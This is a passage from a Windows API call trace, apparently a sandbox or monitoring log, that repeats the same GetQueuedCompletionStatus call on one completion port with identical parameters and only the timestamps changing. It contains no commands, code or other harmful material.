lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.316] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.317] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.318] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.319] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.320] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.321] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c) returned 0 [0158.322] GetQueuedCompletionStatus (in: CompletionPort=0x2ac, lpNumberOfBytesTransferred=0x73dff80, lpCompletionKey=0x73dff74, lpOverlapped=0x73dff6c, dwMilliseconds=0xffffffff | out: 